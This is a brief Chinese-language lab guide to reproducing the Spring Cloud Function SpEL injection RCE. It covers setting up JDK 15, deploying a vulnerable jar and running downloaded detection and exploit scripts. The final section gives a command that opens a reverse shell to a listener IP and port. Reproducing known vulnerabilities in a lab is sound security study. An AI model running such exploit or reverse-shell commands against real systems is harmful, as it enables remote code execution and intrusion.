【Nday】Spring-Cloud-SpEL-表达式注入漏洞复现

# 环境搭建

JDK 15下载：

 

https://www.oracle.com/java/technologies/javase/jdk15-archive-downloads.html

 

 

 

在CentOS7上安装JDK 15环境

 

rpm -ivh jdk-15.0.2_linux-x64_bin.rpm

 

 

 

漏洞环境下载：

 

https://github.com/N1ce759/Spring-Cloud-Function-SPEL-RCE

 

部署漏洞环境：

 

java -jar SpringCloud-Function-0.0.1-SNAPSHOT.jar

 

 

 

# 漏洞复现

访问：http://192.168.160.146:9000/

 

 

 

工具下载地址：

 

https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE

 

 

 开始检测漏洞并反弹shell

## 检测漏洞
python3 Spel_RCE_POC.py url.txt
## 反弹shell
python3 Spel_RCE_Bash_EXP.py http://192.168.160.146:9000/ 192.168.160.241 7777